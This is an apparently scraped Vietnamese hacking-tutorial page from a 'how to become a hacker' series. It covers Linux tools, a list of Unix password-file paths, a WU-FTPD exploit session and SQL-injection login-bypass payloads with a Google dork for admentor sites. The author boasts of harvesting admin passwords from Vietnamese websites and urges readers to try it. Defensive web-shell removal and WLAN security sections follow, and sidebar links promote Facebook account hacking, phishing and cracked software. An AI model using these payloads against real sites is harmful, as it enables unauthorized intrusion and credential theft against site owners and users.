_ Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep “something”
Vidu : $ps axuw | grep “level1″
_ Lệnh Strings: in ra tất cả các ký tự in được trong 1 file. Dùng nó để tìm các khai báo hành chuỗi trong chương trình, hay các gọi hàm hệ thống, có khi tìm thấy cả password nữa
VD: $strings /usr/bin/level1
_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để theo dõi flow của chương trình, cách nhanh nhất để xác định chương trình bị lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace .
Ví dụ : $strace /usr/bin/level1
_ Lệnh” cat, more “: in nội dung file ra màn hình

$cat /etc/passwd | more –> nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .
$more /etc/passwd —-> Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ liệu nhập vào .
Ví dụ : $echo AAAA | hexdump
_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .
Ví dụ : $gcc -o -g bof bof.c
Ví dụ : $make bof
Ví dụ : $gdb level1
(gdb) break main
(gdb) run
_ Lệnh perl: một ngôn ngữ
Ví dụ : $perl -e ‘print “A”x1024’ | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh vào 1024 kí tự )
_ Lệnh “bash” : đã đến lúc tự động hoá các tác vụ của bạn bằng shell script, cực mạnh và linh hoạt .
Bạn muốn tìm hiểu về bash , xem nó như thế nào :
$man bash
_ Lệnh ls : Xem nội dung thư mục ( Liệt kê file trong thư mục ) .
Ví Dụ : $ ls /home —-> sẽ hiện toàn bộ file trong thư mục Home
$ ls -a —–> hiện toàn bộ file , bao gồm cả file ẩn
$ ls -l —–> đưa ra thông tin về các file
_ Lệnh ghi dữ liệu đầu ra vào 1 file :
Vídụ : $ ls /urs/bin > ~/convoi ——> ghi dữ liệu hiển thị thông tin của thư mục bin vào 1 file convoi .

34 . ) Những hiểu biết cơ bản xung quanh Linux :

a . ) Một vài thư mục quan trọng trên server :

_ /home : nơi lưu giữ các file người sử dụng ( VD : người đăng nhập hệ thống có tên là convit thì sẽ có 1 thư mục là /home/convit )
_ /bin : Nơi xử lý các lệnh Unix cơ bản cần thiết như ls chẳng hạn .
_ /usr/bin : Nơi xử lý các lệnh dặc biệt khác , các lệnh dùng bởi người sử dụng đặc biệt và dùng quản trị hệ thống .
_ /bot : Nơi mà kernel và các file khác được dùng khi khởi động .
_ /ect : Các file hoạt động phụ mạng , NFS (Network File System ) Thư tín ( Đây là nơi trọng yếu mà chúng ta cần khai thác nhiều nhất )
_ /var : Các file quản trị
_ /usr/lib : Các thư viện chuẩn như libc.a
_ /usr/src : Vị trí nguồn của các chương trình .

b . ) Vị trí file chứa passwd của một số phiên bản khác nhau :

CODE
AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *


35 . ) Khai thác lỗi của Linux qua lỗ hổng bảo mật của WU-FTP server :

_ WU-FTP Server (được phát triển bởi đại Học Washington ) là một phần mềm Server phục vụ FTP được dùng khá phổ biến trên các hệ thống Unix & Linux ( tất cả các nhà phân phối: Redhat, Caldera, Slackware, Suse, Mandrake….) và cả Windows…. , các hacker có thể thực thi các câu lệnh của mình từ xa thông qua file globbing bằng cách ghi đè lên file có trên hệ thống .
_ Tuy nhiên , việc khai thác lỗi này không phảI là dễ vì nó phải hội đủ những điều kiện sau :
+ Phải có account trên server .
+ Phải đặt được Shellcode vào trong bộ nhớ Process của Server .
+ Phải gửi một lệnh FTP đặc biệt chứa đựng một globbing mẫu đặc biệt mà không bị server phát hiện có lỗi .
+ Hacker sẽ ghi đè lên một Function, Code tới một Shellcode, có thể nó sẽ được thực thi bới chính Server FTP .
_ Ta hãy phân tích VD sau về việc ghi đè lên file của server FTP :

CODE
ftp> open localhost <== lệnh mở trang bị lỗi .
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== xâm nhập thành công FTP server .
Name (localhost:root): anonymous <== Nhập tên chỗ này
331 Guest login ok, send your complete e-mail address as password.
Password:………..<== nhập mật khẩu ở đây
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== sử dụng biến nhị phân để chuyển đổi file .
ftp> ls ~{ <== lệnh liệt kê thư mục hiện hành .
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21 ç chấp nhận kết nốI ở cổng 21 .
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thác lỗi Wu.ftpd .
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c

Việc khai thác qua lỗi này đến nay tôi test vẫn chưa thành công ( chẳng biết làm sai chỗ nào ) . Vậy bạn nào làm được hãy post lên cho anh em biết nhé .
Lỗi Linux hiện nay rất ít ( đặc biệt là đối với Redhat ), các bạn hãy chờ đợi nếu có lỗi gì mới thì bên “LỗI bảo mật” sẽ cập nhật ngay . Khai thác chúng như thế nào thì hỏi Mod quản lý bên đó , đặc biệt là bạn Leonhart , cậu ta siêng trả lời các bạn lắm .

( Dựa theo bài viết của huynh Binhnx2000 )

36 . ) Tìm hiểu về SQL Injection :

_ SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, thi hành lệnh từ xa, đoạt dữ liệu và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, …
_ Bạn có thể kiếm được trang Web bị lỗi bằng cách dùng các công cụ tìm kiếm để kiếm các trang cho phép submit dữ liệu . Một số trang Web chuyển tham số qua các khu vực ẩn nên bạn phảI viewsource mớI thấy được . VD ta xác định được trang này sử dụng Submit dữ liệu nhờ nhìn vào mã mà ta đã viewsource :

CODE
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

_ Kiểm tra thử xem trang Web có bị lỗi này hay không bằng cách nhập vào login và pass lân lượt như sau :

– Login: hi’ or 1=1–
– Pass: hi’ or 1=1–

Nếu không được bạn thử tiếp với các login và pass sau :

CODE
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’=’a
” or “a”=”a
‘) or (‘a’=’a

Nếu thành công, bạn có thể login vào mà không cần phải biết username và password .
Lỗi này có dính dáng đến Query nên nếu bạn nào đã từng học qua cơ sở dữ liệu có thể khai thác dễ dàng chỉ bằng cách đánh các lệnh Query trên trình duyệt của các bạn . Nếu các bạn muốn tìm hiểu kỹ càng hơn về lỗi này có thể tìm các bài viết của nhóm vicky để tìm hiểu thêm .

37 . ) Một VD về hack Web thông qua lỗi admentor ( Một dạng của lỗi SQL Injection ) :

_ Trước tiên bạn vào google.com tìm trang Web admentor bằng từ khoá “allinurl : admentor” .
_ Thông thường bạn sẽ có kết quả sau :

http://www.someserver.com/admentor/admin/admin.asp

_ Bạn thử nhập “ ‘ or ”=’ ” vào login và password :

CODE
Login : ‘ or ”=’
Password : ‘ or ”=’

_ Nếu thành công bạn sẽ xâm nhập vào Web bị lỗi với vai trò là admin .
_ Ta hãy tìm hiểu về cách fix lỗi này nhé :
+ Lọc các ký tự đặc biệt như “ ‘ ” ~ ” bằng cách chêm vào javascrip đoạn mã sau :

CODE
function RemoveBad(strTemp)
{
strTemp = strTemp.replace(/<|>|”|’|%|;|(|)|&|+|
-/g,””);
return strTemp;
}

+ Và gọi nó từ bên trong của asp script :

CODE
var login = var TempStr = RemoveBad
(Request.QueryString(“login”));
var password = var TempStr = RemoveBad
(Request.QueryString(“password”));

_ Vậy là ta đã fix xong lỗi .
_ Các bạn có thể áp dụng cách hack này cho các trang Web khác có submit dữ liệu , các bạn hãy test thử xem đi , các trang Web ở Việt Nam mình bị nhiều lắm , tôi đã kiếm được kha khá pass admin bằng cách thử này rồi ( nhưng cũng đã báo để họ fix lại ) .
_ Có nhiều trang khi login không phải bằng “ ‘ or ”=’ ” mà bằng các nick name có thật đã đăng ký trên trang Web đó , ta vào link “thành viên” kiếm nick của một admin để test thử nhé .
Hack vui vẻ .

 

Series : Làm sao để trở thành hacker

loading...

Tạo folder ẩn cho window :D

1

cls
@ECHO OFF
title Folder Private
if EXIST “HTG Locker” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “HTG Locker”
attrib +h +s “HTG Locker”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p “pass=>”
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s “HTG Locker”
ren “HTG Locker” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

thay thế khóa PASSWORD_GOES_HERE bằng mật khẩu của bạn

– Lưu file mới của bạn này dưới định dạng .bat và tên file là locker.bat.
– Trong thư mục mà bạn đã tạo trong bước 1, kích đúp vào file locker.bat, lúc này bạn sẽ thấy có một thư mục mang tên Private, nơi bạn có thể đặt mọi thứ mình muốn.
– Sau khi thoát, kích đúp vào file locker.bat lần nữa. Khi đó bạn sẽ gặp nhắc nhở hỏi bạn có muốn khóa thư mục của mình hay không. Nhấn Y và thư mục riêng sẽ biến mất.
– Để lấy lại thư mục Private, tất cả những gì bạn cần thực hiện là kích đúp vào file locker.bat và nhập vào mật khẩu mà bạn thiết lập trong bước 4, lúc này thư mục sẽ xuất hiện lại để bạn có thể truy cập.

loading...

Cách đơn giản phát hiện và loại bỏ shell

2

Chào các bạn, bài viết này mình sẽ hướng dẫn kỹ thuật căn bản trong việc phát hiện và loại bỏ shell, một dạng code giống như công cụ hỗ trợ cho việc hack website của hacker có khả năng can thiệp sâu vào máy chủ mà không cần sự cho phép hay đăng nhập.

Một ngày, nếu website của bạn bị hack, sau đó bạn fix và bảo mật lại, nhưng nếu trên host còn shell do hacker up thì bạn chắc chắn sẽ bị hack tiếp, dù bảo mật đến mức nào.
Không nói tới các kỹ thuật hack dựa vào lỗ hổng bảo mật cũng như cách vá, bài viết này chỉ hướng dẫn bạn loại bỏ shell. Những kiến thức này không giúp bạn bảo mật website hoàn toàn. Bạn cần đọc thêm nhiều tài liệu về các lỗ hổng, cách thức tấn công, cách phân quyền…Bài viết chỉ giúp bạn không chết một cách tức tưởi vì shell.

Giao diện của một con Shell khi chạy trên trình duyệt:

Bài viết gồm 2 phần:

1. Loại bỏ shell trong code.
– Khi tấn công được vào host của bạn, hacker sẽ tìm cách upload shell vào trong để tạo backdoor quay lại tấn công sau. Cũng có thể bạn sử dụng code được chia sẻ và trong code đã ẩn giấu shell sẵn mà bạn không biết. Khi đó thì site bạn có thể bị hack bất cứ lúc nào.
– Thông thường, shell trong code sẽ được up vào chỗ mà bạn ít khi để ý tới, với một cái tên nhìn qua dễ tưởng là thành phần trong code.
A. Quét virus bằng công cụ trong Panel hosting.
– Các panel hosting thường tích hợp công cụ quét virus (shell cũng là virus) là ClamAV. Một số loại shell thông thường có thể bị công cụ này phát hiện ra. Bạn tìm trong Panel host chỗ có từ khóa virus, rất dễ làm.
B. Quét shell bằng công cụ chuyên dụng.
Sử dụng công cụ trong file đính kèm, upload lên host (ngang hàng index). Sau đó từ trình duyệt bạn gõ: http://tenweb/scan.php

Bấm nút tìm kiếm

Chờ một chút, nó sẽ liệt kê cho bạn các file nghi ngờ trong danh sách màu đỏ. Lưu ý không phải file nào cũng là shell.

– Bạn kiểm tra từng file một. Thông thường với một code VBB, nếu bạn thấy file lạ, không có trong bộ code gốc thì dễ nó là shell.
– File có trong bộ code gốc thì bạn edit nó, so sánh với file gốc xem có giống không, nếu không thì nó chính là shell.
– Những file mà trong nội dung không có gì ngoài những đoạn code được mã hóa loằng ngoằng>> Shell
– Nếu một file bạn nghi ngờ, chẳng hạn nó nằm trong thư mục www/includes. Bạn thử chạy ngoài trình duyệt http://website/includes/tenfile.php nếu là shell nó sẽ lộ diện ngay ra một giao diện can thiệp file trên host.

Khoanh màu trắng chính là một con Shell:

Cách xử lý: Xóa (sao lưu) toàn bộ file phát hiện là shell.

2. Loại bỏ shell include trong Database
– Ngoài việc upload shell bằng file php ngoài code dễ bị phát hiện, hacker còn có thể include shell vào trong database, trong plugin của WordPress. Cách này rất khó bị phát hiện.
– Backup Database để tránh tình trạng lỗi có thể xảy ra.
– Vào Admincp (Đối với VBB) chọn mục Plugins and Products >> Plugin Manager.
Nhìn cột Hook Location nếu có dòng “init_startup” thì đó là một con shell. Xóa bỏ.
– Vào phpMyAdmin. Vào Database của website, search.
Gõ vào ô tìm kiếm từ khóa base64 và chọn Select All như hình:

Bấm Go để tìm kiếm.

Kết quả ra một tràng dài, bạn chỉ chú ý vào những dòng có báo 1 matches trở lên. Những dòng đó bên phải sẽ có thêm chữ Browser và Delete.
– Nếu nó ở tab Plugin, bạn nên xóa dòng đó đi (bấm Delete) vì khả năng là Shell rất cao, mà xóa đi cũng không ảnh hưởng gì cả.
– Nếu ở tab khác, bạn bấm Browser xem nội dung của nó. Ctrl F từ khóa “base64” tìm tới chỗ có để xem code nó như thế nào. Nếu nó mã hóa lằng ngoằng thì khả năng là shell >> Xóa.
– Nó mà ở tab Template thì cũng khả năng cao là shell >> Giao diện đã bị dính shell. Tạm bỏ giao diện ấy đi.

Hi vọng giúp bạn loại bỏ shell trong website của mình. Với các website khác không phải WordPress thì cũng tương tự như vậy.

Link download

 

loading...

Các phương thức bảo mật mạng WLAN

0

Với giá thành xây dựng một hệ thống mạng WLAN giảm,ngày càng có nhiều công ty sử dụng.

Điều này sẽ không thể tránh khỏi việc Hacker chuyển sang tấn công và khai thác các điểm yếu trên nền tảng mạng sử dụng chuẩn 802.11. Những công cụ Sniffers cho phép tóm được các gói tin giao tiếp trên mạng, họ có thể phân tích và lấy đi những thông tin quan trọng của bạn. Vậy bạn đã biết gì về các phương thức bảo mật mạng WLAN.

Những phần mềm scan có thể được cài đặt trên các thiết bị như Smart Phone hay trên một chiếc Laptop hỗ trợ chuẩn kết nối Wi-Fi.

alt

Điều này dẫn tới những thông tin nhạy cảm trong hệ thống mạng, như thông tin cá nhân của người dùng…

Những nguy cơ bảo mật trong WLAN bao gồm:

alt

– Các thiết bị có thể kết nối tới những Access Point đang broadcast SSID.

– Hacker sẽ cố gắng tìm kiếm các phương thức mã hoá đang được sử dụng trong quá trình truyền thông tin trên mạng, sau đó có phương thức giải mã riêng và lấy các thông tin nhạy cảm.

– Người dụng sử dụng Access Point tại gia đình sẽ không đảm bảo tính bảo mật như khi sử dụng tại doanh nghiệp.

Để bảo mật mạng WLAN, bạn cần thực hiện qua các bước sau:

alt

– Chỉ có những người dùng được xác thực mới có khả năng truy cập vào mạng thông qua các Access Point.

– Các phương thức mã hoá được áp dụng trong quá trình truyền các thông tin quan trọng.

– Bảo mật các thông tin và cảnh báo nguy cơ bảo mật bằng hệ thống IDS và IPS.

Xác thực và bảo mật dữ liệu bằng cách mã hoá thông tin truyền trên mạng.

IDS như một thiết bị giám sát mạng Wireless và mạng Wire để tìm kiếm và cảnh báo khi có các dấu hiệu tấn công.

Ban đầu, IEEE 802.11 sử dụng giải pháp bảo mật bằng những khoá tĩnh (static keys) cho cả quá trình mã hoá và xác thực. Phương thức xác thực như vậy là không đủ mạnh, cuối cùng có thể bị tấn công. Bởi vì các khoá được quản lý và không thay đổi, điều này không thể áp dụng trong một giải pháp doanh nghiệp lớn được.

Cisco giới thiệu và cho phép sử dụng IEEE 802.1x là giao thức xác thực và sử dụng khoá động (dynamic keys), bao gồm 802.1x Extensible Authentication Protocol (EAP). Cisco cũng giới thiệu phương thức để chống lại việc tấn công bằng cách sử dụng quá trình băm (hashing) (Per Packet Key – PPK) và Message Integrity Check (MIC). Phương thức này được biết đến như Cisco Key Integrity Protocol (CKIP) và Cisco Message Integrity Check (CMIC).

Các tổ chức chuẩn 802.11 bắt đầu tiến hành việc nâng cấp bảo mật cho mạng WLAN. Wi-Fi Alliance giới thiệu giải pháp WPA (Wi-Fi Protected Access). Một chuẩn nằm trong chuẩn 802.11i là chuẩn bảo mật của WLAN và sử dụng chuẩn 802.1x làm phương thức xác thực và mã hoá dữ liệu. WPA được sử dụng cho việc xác thực người dung, MIC, Temporal Key Integrity Protocol (TKIP), và Dynamic Keys. Nó tương tự như phương thức của Cisco nhưng cách thực hiện có khác đôi chút. WPA cũng bao gồm một passphrase hay preshared key cho người dung để họ xác thực trong giải pháp bảo mật trong gia đình, nhưng không được sử dụng cho giải pháp doanh nghiệp.

Ngày nay , IEEE 802.11i đã nâng cấp và Advanced Encryption Standard (AES) đã thay thế cho WEP và là phương thức bảo mật mới nhất và bảo mật nhất trong mã hoá dữ liệu. Wireless IDS hiện nay đã có với vai trò nhận diện và bảo vệ hệ thống WLAN trước những tấn công. Wi-Fi Alliance 802.11i làm việc và sử dụng như WPA2

alt

Các Access Point gửi broadcast một hoặc nhiều SSIDs, hay data rates, và một số thông tin. Các thiết bị Wi-Fi có thể scan tất cả các kênh và tìm truy cập vào bất kỳ mạng nào mà họ scan ra được từ những Access Point. Client sẽ thường kết nối tới những Access Point mà tín hiệu mạnh nhất. Nếu tín hiệu yếu, client tiếp tục scan tới một Access Point khác (trong trường hợp Roaming). Trong quá trình kết nối, SSID, địa chỉ MAC và các thiết lập bảo mật được gửi từ client tới Access Point và kiểm tra bởi Access Point.

alt

Người dung được xác thực thong qua giao thức 802.1x. Với chuẩn 802.1x hay EAP cần thiết trên WLAN client. Access Point cũng có thể như một máy chủ đáp ứng việc xác thực cho người dùng, hoặc có thể lien kết tới máy chủ RADIUS nhờ xác thực hộ, hoặc có thể làm việc với Cisco Secure ACS. Lightweight Access Poínt sẽ giao tiếp với WLAN controller, và nó làm việc như một máy chủ xác cung cấp xác thực cho các users.

Client và máy chủ cung cấp xác thực triển khai với hai phiên bản EAP khác nhau. Thông tin EAP sẽ được truyền từ Access point tới máy chủ xác thực

alt

Sau khi xác thực song WLAN client, dữ liệu sẽ được mã hoá trước khi truyền đi. Về cơ bản phương thức mã hoá dựa vào thuật toán RC4 được sử dụng bắt đầu từ WEP. TKIP sử dụng mã hoá RC4 được tăng cường bảo mật hơn và với nhiều bít mã hoá hơn và có khoá tích hợp cho mỗi packet (key per packet –PPK). AES được thay thế cho RC4 với thuật toán bảo mật cao cấp hơn. WPA sử dụng TKIP, trong khi WPA2 sử dụng AES hay TKIP.

alt

Sự khác nhau giữa các dạng WLANs.

– Cho các điểm truy cập tự động (hotspots), việc mã hoá không cần thiết, chỉ cần người dung xác thực mà thôi.

– Với người dùng sử dụng mạng WLAN cho gia đình, một phương thức bảo mật với WPA passphare hay preshared key được khuyến cáo sử dụng.

– Với giải pháp doanh nghiệp, để tối ưu quá trình bảo mật với 802.1x EAP làm phương thức xác thực và TKIP hay AES làm phương thức mã hoá. Được dựa theo chuẩn WPA hay WPA2 và 802.11i security.

alt

Bảo mật mạng WLAN cũng tương tự như bảo mật cho các hệ thống mạng khác. Bảo mật hệ thống phải được áp dụng cho nhiều tầng, các thiết bị nhận dạng phát hiện tấn công phải được triển khai. Giới hạn các quyền truy cập tối thiểu cho những người dùng cần thiết. Dữ liệu được chia sẻ và yêu cầu xác thực mới cho phép truy cập. Dữ liệu truyền phải được mã hoá.

Kẻ tấn công có thể tấn công mạng WLAN không bảo mật bất cứ lúc nào. Bạn cần có một phương án triển khai hợp lý.

alt

– Phải ước lượng được các nguy cơ bảo mật và các mức độ bảo mật cần thiết để áp dụng.

– Đánh giá được toàn bộ các giao tiếp qua WLAN và các phương thức bảo mật cần được áp dụng.

– Đánh giá được các công cụ và các lựa chọn khi thiết kế về triển khai mạng WLAN.

Theo VNE Research Deparment

So sánh các phương thức bảo mật dựa trên việc chứng thực (sưu tầm)

I Bảo mật bằng WEP (Wired Equivalent Privacy)

WEP là một thuật toán bảo nhằm bảo vệ sự trao đổi thông tin chống lại sự nghe trộm, chống lại những nối kết mạng không được cho phép cũng như chống lại việc thay đổi hoặc làm nhiễu thông tin truyền. WEP sử dụng stream cipher RC4 cùng với một mã 40 bit và một số ngẫu nhiên 24 bit (initialization vector – IV) để mã hóa thông tin. Thông tin mã hóa được tạo ra bằng cách thực hiện operation XOR giữa keystream và plain text. Thông tin mã hóa và IV sẽ được gửi đến người nhận. Người nhận sẽ giải mã thông tin dựa vào IV và khóa WEP đã biết trước. Sơ đồ mã hóa được miêu tả bởi hình 1.

alt

Hình 1: Sơ đồ mã hóa bằng WEP

Những điểm yếu về bảo mật của WEP

+ WEP sử dụng khóa cố định được chia sẻ giữa một Access Point (AP) và nhiều người dùng (users) cùng với một IV ngẫu nhiên 24 bit. Do đó, cùng một IV sẽ được sử dụng lại nhiều lần. Bằng cách thu thập thông tin truyền đi, kẻ tấn công có thể có đủ thông tin cần thiết để có thể bẻ khóa WEP đang dùng.

+ Một khi khóa WEP đã được biết, kẻ tấn công có thể giải mã thông tin truyền đi và có thể thay đổi nội dung của thông tin truyền. Do vậy WEP không đảm bảo được confidentialityintegrity.

+ Việc sử dụng một khóa cố định được chọn bởi người sử dụng và ít khi được thay đổi (tức có nghĩa là khóa WEP không được tự động thay đổi) làm cho WEP rất dễ bị tấn công.

+ WEP cho phép người dùng (supplicant) xác minh (authenticate) AP trong khi AP không thể xác minh tính xác thực của người dùng. Nói một cách khác, WEP không cung ứng mutual authentication.

II. Bảo mật bằng WPA (Wifi Protected Access )

WPA là một giải pháp bảo mật được đề nghị bởi WiFi Alliance nhằm khắc phục những hạn chế của WEP. WPA được nâng cấp chỉ bằng một update phần mềm SP2 của microsoft.
WPA cải tiến 3 điểm yếu nổi bật của WEP :

+ WPA cũng mã hóa thông tin bằng RC4 nhưng chiều dài của khóa là 128 bit và IV có chiều dài là 48 bit. Một cải tiến của WPA đối với WEP là WPA sử dụng giao thức TKIP (Temporal Key Integrity Protocol) nhằm thay đổi khóa dùng AP và user một cách tự động trong quá trình trao đổi thông tin. Cụ thể là TKIP dùng một khóa nhất thời 128 bit kết hợp với địa chỉ MAC của user host và IV để tạo ra mã khóa. Mã khóa này sẽ được thay đổi sau khi 10 000 gói thông tin được trao đổi.

+ WPA sử dụng 802.1x/EAP để đảm bảo mutual authentication nhằm chống lại man-in-middle attack. Quá trình authentication của WPA dựa trên một authentication server, còn được biết đến với tên gọi RADIUS/ DIAMETER. Server RADIUS cho phép xác thực user trong mạng cũng như định nghĩa những quyền nối kết của user. Tuy nhiên trong một mạng WiFi nhỏ (của công ty hoăc trường học), đôi khi không cần thiết phải cài đặt một server mà có thể dùng một phiên bản WPA-PSK (pre-shared key). Ý tưởng của WPA-PSK là sẽ dùng một password (Master Key) chung cho AP và client devices. Thông tin authentication giữa user và server sẽ được trao đổi thông qua giao thức EAP (Extensible Authentication Protocol). EAP session sẽ được tạo ra giữa user và server đêr chuyển đổi thông tin liên quan đến identity của user cũng như của mạng. Trong quá trình này AP đóng vai trò là một EAP proxy, làm nhiệm vụ chuyển giao thông tin giữa server và user. Những authentication messages chuyển đổi được miêu tả trong hình 2.

alt
Hình 2: Messages trao đổi trong quá trình authentication.

+ WPA sử dụng MIC (Michael Message Integrity Check ) để tăng cường integrity của thông tin truyền. MIC là một message 64 bit được tính dựa trên thuật tóan Michael. MIC sẽ được gửi trong gói TKIP và giúp người nhận kiểm tra xem thông tin nhận được có bị lỗi trên đường truyền hoặc bị thay đổi bởi kẻ phá hoại hay không.
Tóm lại, WPA được xây dựng nhằm cải thiện những hạn chế của WEP nên nó chứa đựng những đặc điểm vượt trội so với WEP. Đầu tiên, nó sử dụng một khóa động mà được thay đổi một cách tự động nhờ vào giao thức TKIP. Khóa sẽ thay đổi dựa trên người dùng, session trao đổi nhất thời và số lượng gói thông tin đã truyền. Đặc điểm thứ 2 là WPA cho phép kiểm tra xem thông tin có bị thay đổi trên đường truyền hay không nhờ vào MIC message. Và đăc điểm nối bật thứ cuối là nó cho phép multual authentication bằng cách sử dụng giao thức 802.1x

Những điểm yếu của WPA.
– Điểm yếu đầu tiên của WPA là nó vẫn không giải quyết được denial-of-service (DoS) attack [5]. Kẻ phá hoại có thể làm nhiễu mạng WPA WiFi bằng cách gửi ít nhất 2 gói thông tin với một khóa sai (wrong encryption key) mỗi giây. Trong trường hợp đó, AP sẽ cho rằng một kẻ phá hoại đang tấn công mạng và AP sẽ cắt tất cả các nối kết trong vòng một phút để trách hao tổn tài nguyên mạng. Do đó, sự tiếp diễn của thông tin không được phép sẽ làm xáo trộn hoạt động của mạng và ngăn cản sự nối kết của những người dùng được cho phép (authorized users).

– Ngoài ra WPA vẫn sử dụng thuật tóan RC4 mà có thể dễ dàng bị bẻ vỡ bởi FMS attack đề nghị bởi những nhà nghiên cứu ở trường đại học Berkeley [6]. Hệ thống mã hóa RC4 chứa đựng những khóa yếu (weak keys). Những khóa yếu này cho phép truy ra khóa encryption. Để có thể tìm ra khóa yếu của RC4, chỉ cần thu thập một số lượng đủ thông tin truyền trên kênh truyền không dây.

– WPA-PSK là một biên bản yếu của WPA mà ở đó nó gặp vấn đề về quản lý password hoăc shared secret giữa nhiều người dùng. Khi một người trong nhóm (trong công ty) rời nhóm, một password/secret mới cần phải được thiết lập.

III. Tăng cường bảo mật với chuẩn 802.11i (WPA2)

Chuẩn 802.11i được phê chuẩn vào ngày 24 tháng 6 năm 2004 nhằm tăng cường tính mật cho mạng WiFi. 802.11i mang đầy đủ các đặc điểm của WPA. Tập hợp những giao thức của 802.11i còn được biết đến với tên gọi WPA 2. Tuy nhiên, 802.11i sử dụng thuật toán mã hóa AES (Advanced Encryption Standard) thay vì RC4 như trong WPA. Mã khóa của AES có kích thước là 128, 192 hoặc 256 bit. Tuy nhiên thuật toán này đổi hỏi một khả năng tính toán cao (high computation power). Do đó, 802.11i không thể update đơn giản bằng software mà phải có một dedicated chip. Tuy nhiên điều này đã được ước tính trước bởi nhiều nhà sản xuất nên hầu như các chip cho card mạng Wifi từ đầu năm 2004 đều thích ứng với tính năng của 802.11i.

loading...
cách hack nick facebook của người khác

Cách hack nick facebook bằng điện thoại

50
Facebook là mạng xã hội được cộng đồng mạng sử dụng nhiều nhất hiện nay. Dưới đây chúng tôi sẽ hướng dẫn bạn đọc...

Hướng dẫn đọc trộm tin nhắn facebook qua token

80
Trong bài viết này AD sẽ hướng dẫn các bạn đọc trộm tin nhắn facebook của người khác mà không cần biết email, mật...

Chia Sẻ Tool ATP của ATP Software Cracked

198
Cập nhật ngày : 25/10 : Đã fix lại link AD chia sẻ lại bộ Tool ATP của ATP Software đã được crack thành công cho mọi...

Làm thế nào để trở thành Hacker ( Part 7) – hackerrank

2
PART 7 hackerrank 42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : _ WircSrv IRC là một Server IRC thông dụng trên...

Hướng dẫn hack pass Wifi WPA/WPA2-PSK

26
Mặc dù trên mạng có rất nhiều công cụ và hướng dẫn cách hack wifi WPA/WPA2 - PSK, thậm chí có cả cách hack...

Hướng dẫn mở nick facebook bị report

9
CÁCH mở nick facebook bị report 1/nên xài cmnd thật . kháng nghị xong vô mail reply theo mẫu 13t và 14t —————————————————————————————– Hi Team Facebook. Please check...

Hack nick facebook bằng trang web giả- phising page

10
Phishing là gì ? Tìm hiểu phương thức Phishing ! Phishing phương thức tạo ra những trang web giả một cách tinh vi để dụ dỗ những người...
cách lấy lại tài khoản facebook bị mất

Cách lấy lại tài khoản facebook bị mất

2
Lấy lại tài khoản facebook  - Các bạn biết đấy Facebook là mạng xã hội lớn nhất hiện nay với số lượng người dùng...

Cấu Trúc If … Else Trong Ngôn Ngữ C++

3
Cấu trúc c++: giới thiệu   Trong quá trình viết các chương trình, bài toán của chúng ta thường xuất hiện các trường hợp khác nhau...

Hack nick facebook người khác trong 2 phút [ 2017 ]

21
Giới thiệu kĩ thuật hack nick facebook : Trong bài viết này mình sẽ giới thiệu cho các bạn một cách hack nick facebook người khác trong...